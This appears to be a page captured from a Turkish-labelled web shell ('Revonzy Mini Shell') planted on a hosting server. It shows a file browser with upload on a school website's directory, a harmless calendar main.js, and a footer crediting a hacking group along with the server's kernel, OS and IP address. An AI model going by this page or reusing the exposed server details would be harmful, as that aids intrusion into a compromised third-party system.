Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/cal/pg-calendar-master/src/js/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/swamipolytechnic.org/cal/pg-calendar-master/src/js/main.js

define([
    'core',
    'component/models'
], function (Component, Models) {
    'use strict';

    const PignoseCalendar = function (element, options) {
        if (typeof Component[options] !== 'undefined') {
            return Component[options].apply(element, Array.prototype.slice.call(arguments, 2));
        }
        else if (typeof options === 'object' || !options) {
            return Component.init.apply(element, Array.prototype.slice.call(arguments, 1));
        }
        else {
            console.error('Argument error are occured.');
        }
    };

    for (const idx in Models) {
        PignoseCalendar[idx] = Models[idx];
    }

    return PignoseCalendar;
});

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4